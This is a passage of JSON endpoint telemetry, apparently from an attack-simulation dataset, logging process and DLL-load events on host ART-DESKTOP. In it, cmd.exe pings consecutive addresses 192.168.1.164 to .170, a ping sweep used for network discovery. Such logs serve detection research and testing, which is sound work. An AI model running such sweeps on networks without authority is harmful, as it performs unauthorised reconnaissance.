"pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "process", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572786840000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.164", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4724, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4724, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572786990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "event_type": "process", - "pid": 4724, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572791840000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-001041255301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.165", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4816, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572791980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "event_type": "process", - "pid": 4816, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010B2275301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.166", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572797029984, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572796980000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "event_type": "process", - 
"pid": 1284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572801990000, - "unique_pid": "{42FC7E13-CB9F-5C05-0000-0010332A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.167", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4664, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - 
"unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572802140000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "event_type": "process", - "pid": 4664, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572806840000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010A32C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.168", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7448, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": 
"{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572806980000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "event_type": "process", - "pid": 7448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572811990000, - "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.169", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6752, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572812150000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "process", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572816830000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.170", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2792, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": 